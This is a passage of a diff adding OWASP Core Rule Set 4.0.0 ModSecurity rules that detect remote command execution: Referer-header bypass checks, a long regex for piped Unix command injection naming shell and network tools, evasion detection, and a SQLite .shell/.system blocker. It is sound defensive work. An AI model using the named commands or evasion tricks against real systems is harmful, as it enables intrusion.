+ tag:'PCI/6.5.2',\
+ ver:'OWASP_CRS/4.0.0',\
+ severity:'CRITICAL',\
+ setvar:'tx.932200_matched_var_name=%{matched_var_name}',\
+ chain"
+ SecRule MATCHED_VAR "@rx /" \
+ "t:none,t:urlDecodeUni,\
+ chain"
+ SecRule MATCHED_VAR "@rx \s" \
+ "t:none,t:urlDecodeUni,\
+ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
+
+#
+# -=[ Rule 932205 ]=-
+#
+# Sibling of 932200 targeting the Referer header. URLs cause false positives in rule 932200
+# and must be handled with additional checks.
+#
+# Regular expression generated from regex-assembly/932205.ra.
+# To update the regular expression run the following shell script
+# (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
+# crs-toolchain regex update 932205
+#
+SecRule REQUEST_HEADERS:Referer "@rx ^[^\.]+\.[^;\?]+[;\?](.*(['\*\?\x5c`][^\n/]+/|/[^/]+?['\*\?\x5c`]|\$[!#-\$\(\*\-0-9\?-\[_a-\{]))" \
+ "id:932205,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:lowercase,t:urlDecodeUni,\
+ msg:'RCE Bypass Technique',\
+ logdata:'Matched Data: %{TX.2} found within %{TX.932205_MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-rce',\
+ tag:'paranoia-level/2',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/152/248/88',\
+ tag:'PCI/6.5.2',\
+ ver:'OWASP_CRS/4.0.0',\
+ severity:'CRITICAL',\
+ setvar:'tx.932205_matched_var_name=%{matched_var_name}',\
+ chain"
+ SecRule TX:1 "@rx /" \
+ "t:none,t:urlDecodeUni,\
+ chain"
+ SecRule TX:1 "@rx \s" \
+ "t:none,t:urlDecodeUni,\
+ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
+
+#
+# -=[ Rule 932206 ]=-
+#
+# Sibling of 932200 targeting the Referer header. URLs cause false positives in rule 932200
+# and must be handled with additional checks.
+#
+# Regular expression generated from regex-assembly/932206.ra.
+# To update the regular expression run the following shell script
+# (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
+# crs-toolchain regex update 932206
+#
+SecRule REQUEST_HEADERS:Referer "@rx ^[^\.]*?(?:['\*\?\x5c`][^\n/]+/|/[^/]+?['\*\?\x5c`]|\$[!#-\$\(\*\-0-9\?-\[_a-\{])" \
+ "id:932206,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:lowercase,t:urlDecodeUni,\
+ msg:'RCE Bypass Technique',\
+ logdata:'Matched Data: %{TX.0} found within %{TX.932206_MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-rce',\
+ tag:'paranoia-level/2',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/152/248/88',\
+ tag:'PCI/6.5.2',\
+ ver:'OWASP_CRS/4.0.0',\
+ severity:'CRITICAL',\
+ setvar:'tx.932206_matched_var_name=%{matched_var_name}',\
+ chain"
+ SecRule MATCHED_VAR "@rx /" \
+ "t:none,t:urlDecodeUni,\
+ chain"
+ SecRule MATCHED_VAR "@rx \s" \
+ "t:none,t:urlDecodeUni,\
+ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
+
+# Regular expression generated from regex-assembly/932220.ra.
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932220 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i).\|(?:[\s\v]*|b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?y[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?x|c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?l)|[ls][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#
\(\*\-0-9\?-@_a-\{]*)?\x5c?h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t)?|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[arx])?|G[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?E[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?T|a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:b|(?:p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?t|r(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[jp])?|s(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h)?|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[ks])|b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-
@_a-\{]*)?\x5c?z|c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[8-9][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?9|[au][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t|c|(?:m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?p|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h)|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[dfu]|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[gr])|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[bdx]|n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v|q[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n|s(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h)?)|f[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[c-dgi]|m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p)|g[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[chr][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t|o|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?g)|h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:d|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p)|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[dp]|r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b)|j[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:j[\"'\)\[-\x5
c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s|q)|k[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|l[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:d(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d)?|[nps]|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a|z(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?4)?)|m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r|v)|n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[cl]|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t|(?:p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?m)|o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[at][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?x|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b|f|(?:k[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?g|h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[cp]|r(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?y)?|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|x[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z)|r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r|c(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0
-9\?-@_a-\{]*)?\x5c?p)?|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[dv]|(?:p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?m)|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[dt]|[g-hu]|s(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h)?|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n)|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[cr]|b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?l|[co][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[ex]|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c)|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|l)|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:3[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m|c)|x[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:x[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|z)|y[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m)|z[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:i[\"'\)\[-\x5c]*(?:(?:(?:\
|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h))" \
+ "id:932220,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,\
+ msg:'Remote Command Execution: Unix Command Injection with pipe',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-shell',\
+ tag:'platform-unix',\
+ tag:'attack-rce',\
+ tag:'paranoia-level/2',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/152/248/88',\
+ tag:'PCI/6.5.2',\
+ ver:'OWASP_CRS/4.0.0',\
+ severity:'CRITICAL',\
+ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
+
+# -=[ Rule 932240 ]=-
+#
+# Generic RCE Bypass blocking using different techniques: see https://github.com/coreruleset/coreruleset/issues/2632
+#
+# This rule complements rule 932230 with generic evasion detection.
+# Anything that uses a well-known evasion technique should be blocked at this level.
+# The chained rule will exclude false positives due to german thousands separators (e.g., 10'000).
+#
+# Rule relations:
+#
+# .932230 (base rule, PL1, targets prefix + two and three character commands)
+# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command)
+# ..932232 (stricter sibling, PL3, targets prefix + additional command words)
+# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion)
+#
+# .932250 (base rule, PL1, targets two and three character commands)
+# .932260 (base rule, PL1, targets known command word of length > 3 without evasion)
+#
+# .932240 (generic detection, PL2, targets generic evasion attempts)
+# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2,
+# - with and without prefix
+# - words of any length)
+# ..932239 (sibling of 932236, PL2,
+# - with and without prefix
+# - words of any length
+# - targets request headers user-agent and referer only
+# - excluded words: known user-agents)
+# ..932238 (stricter sibling of 932236, PL3,
+# - no excluded words)
+# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3,
+# - targets request headers user-agent and referer only
+# - without prefix
+# - with word boundaries
+# - words of any length
+# - excluded words: known user-agents)
+#
+#
+# Regular expression generated from regex-assembly/932240.ra.
+# To update the regular expression run the following shell script
+# (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
+# crs-toolchain regex update 932240
+#
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS|XML:/* "@rx (?i)[\-0-9_a-z]+(?:[\s\v]*[\"'][^\s\v\"']+[\"']|(?:[\"'][\"']+|[\[-\]]+|\$+[!#\*\-0-9\?-@\x5c_a-\{]+|``|[\$<>]\(\))[\s\v]*)[\-0-9_a-z]+" \
+ "id:932240,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,\
+ msg:'Remote Command Execution: Unix Command Injection evasion attempt detected',\
+ logdata:'Matched Data: %{TX.0} found within %{TX.932240_MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-shell',\
+ tag:'platform-unix',\
+ tag:'attack-rce',\
+ tag:'paranoia-level/2',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/152/248/88',\
+ tag:'PCI/6.5.2',\
+ ver:'OWASP_CRS/4.0.0',\
+ severity:'CRITICAL',\
+ setvar:'tx.932240_matched_var_name=%{matched_var_name}',\
+ chain"
+ SecRule MATCHED_VAR "!@rx [0-9]\s*\'\s*[0-9]" \
+ "t:none,\
+ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
+
+
+
+# [ Sqlite System Command Execution ]
+#
+# This rule prevents execution of SQLite CLI commands like .system and .shell
+#
+# You can find a vulnerable script and a sample payload here:
+# https://github.com/qxxxb/ctf/tree/master/2021/zer0pts_ctf/baby_sqli
+#
+# List of sqlite3 CLI commands:
+# https://sqlite.org/cli.html
+#
+# Regular expression generated from regex-assembly/932210.ra.
+# To update the regular expression run the following shell script
+# (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
+# crs-toolchain regex update 932210
+#
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ;[\s\v]*\.[\s\v]*[\"']?(?:a(?:rchive|uth)|b(?:a(?:ckup|il)|inary)|c(?:d|h(?:anges|eck)|lone|onnection)|d(?:atabases|b(?:config|info)|ump)|e(?:cho|qp|x(?:cel|it|p(?:ert|lain)))|f(?:ilectrl|ullschema)|he(?:aders|lp)|i(?:mpo(?:rt|ster)|ndexes|otrace)|l(?:i(?:mi|n)t|o(?:ad|g))|(?:mod|n(?:onc|ullvalu)|unmodul)e|o(?:nce|pen|utput)|p(?:arameter|r(?:int|o(?:gress|mpt)))|quit|re(?:ad|cover|store)|s(?:ave|c(?:anstats|hema)|e(?:lftest|parator|ssion)|h(?:a3sum|ell|ow)?|tats|ystem)|t(?:ables|estc(?:ase|trl)|ime(?:out|r)|race)|vfs(?:info|list|name)|width)" \
+ "id:932210,\
+ phase:2,\
+ block,\
+ t:none,t:escapeSeqDecode,t:compressWhitespace,\
+ msg:'Remote Command Execution: SQLite System Command Execution',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-shell',\
+ tag:'platform-unix',\
+ tag:'attack-rce',\
+ tag:'paranoia-level/2',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/152/248/88',\
+ tag:'PCI/6.5.2',\
+ ver:'OWASP_CRS/4.0.0',\
+ severity:'CRITICAL',\
+ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
+
+# -=[ SMTP/IMAP/POP3 Command Execution ]=-
+#
+# Rationale
+# =========
+#
+# The rules for email command execution are based on the RFCs for each protocol.
+# Some of the commands have optional and/or additional parameters, so we tried to be
+# precise to avoid as many FP in PL2 rules.
+# For those commands that resemble common English words, and may pose a higher risk of false positives,
+# they have been split off to a sibling rule in PL3.
+
+# =[ SMTP Command Execution ]=
+#
+# This rule prevents execution of SMTP related system commands.
+#
+# List of SMTP commands: from rfc 5321 (https://www.rfc-editor.org/rfc/rfc5321)
+#
+# Regular expression generated from regex-assembly/932300.ra.
+# To update the regular expression run the following shell script
+# (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
+# crs-toolchain regex update 932300
+#
